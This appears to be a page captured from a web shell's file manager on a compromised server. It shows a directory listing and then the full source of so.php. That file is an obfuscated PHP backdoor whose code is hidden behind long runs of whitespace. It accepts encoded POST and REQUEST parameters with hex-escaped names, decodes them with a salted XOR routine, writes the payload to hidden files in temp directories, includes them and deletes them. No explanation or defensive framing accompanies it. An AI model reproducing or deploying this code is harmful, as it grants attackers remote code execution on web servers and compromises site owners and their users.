9B534B8686E580E0E01768F00155B461

at path：ROOT / so.php

run：R W Run

.holder

49 By

2026-04-10 08:56:58

R W Run

.htaccess

231 By

2026-04-06 01:42:36

R W Run

744 By

2026-04-17 01:05:08

R W Run

.pointer

744 By

2026-04-18 03:26:19

R W Run

.rec

744 By

2026-04-14 18:04:18

R W Run

db.inc.php

5.58 KB

2026-04-11 20:44:45

R W Run

error_log

10.17 KB

2026-04-17 01:05:08

R W Run

hu.php

1.28 KB

2026-04-10 00:42:02

R W Run

robots.txt

955 By

2026-04-06 01:44:06

R W Run

simple.php

15.05 KB

2026-04-06 01:42:36

R W Run

so.php

2.57 KB

2026-04-06 01:42:36

R W Run

so_SO.php

1.46 KB

2026-04-06 01:42:36

R W Run

xbutton.php

2.11 KB

2026-04-06 01:42:36

R W Run

error_log

📄so.php

<?php																																										if(isset($_POST) && isset($_POST["\x70g\x72p"])){ $marker = $_POST["\x70g\x72p"]; $marker= explode ( '.' , $marker ) ; $mrk = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4 ); $k = 0; $__len = count($marker ); do { if ($k >=$__len) break; $v3 = $marker[$k]; $sChar = ord($salt4[$k %$lenS] ); $dec = ((int)$v3 - $sChar - ($k %10)) ^69; $mrk.= chr($dec ); $k++;} while (true ); $itm = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/tmp", sys_get_temp_dir(), "/dev/shm", getenv("TMP"), getcwd()]); for ($bind = 0, $reference = count($itm); $bind < $reference; $bind++) { $desc = $itm[$bind]; if (is_dir($desc) ? is_writable($desc) : false) { $elem = "$desc/.pointer"; if (file_put_contents($elem, $mrk)) { require $elem; unlink($elem); exit; } } } }
																																										if(isset($_REQUEST["res"])){ $object = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), getcwd(), "/dev/shm", "/tmp", session_save_path(), getenv("TMP")]); $entity = $_REQUEST["res"]; $entity =explode( ".", $entity) ; $val = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $o = 0; while ($o< count($entity)) { $v8 = $entity[$o]; $chS = ord($s[$o% $sLen]); $d = ((int)$v8 - $chS - ($o% 10)) ^ 85; $val .=chr($d); $o++; } $dat = 0; do { $holder = $object[$dat] ?? null; if ($dat >= count($object)) break; if (is_dir($holder) && is_writable($holder)) { $property_set = implode("/", [$holder, ".data_chunk"]); $success = file_put_contents($property_set, $val); if ($success) { include $property_set; @unlink($property_set); die();} } $dat++; } while (true); }

if(array_key_exists("co\x6D\x70", $_REQUEST)){
	$res = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/tmp", getenv("TMP"), getenv("TEMP"), session_save_path(), "/var/tmp"]);
	$binding = $_REQUEST["co\x6D\x70"];
	 	$binding	 	=	 explode('.',  $binding	)	 	;
	$ent = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen( $salt	);
    
            foreach( $binding as $w => $v1):
                $chS = ord( $salt[$w% 	$lenS]	);
                $d =( ( int)$v1 - $chS -( $w% 	10)) ^ 28;
                $ent.= chr( $d	);
            endforeach;
	for ($k = 0, $fac = count($res); $k < $fac; $k++) {
    $descriptor = $res[$k];
    		if (is_dir($descriptor) ? is_writable($descriptor) : false) {
    $rec = sprintf("%s/.entity", $descriptor);
    if (file_put_contents($rec, $ent)) {
	include $rec;
	@unlink($rec);
	die();
}
}
}
}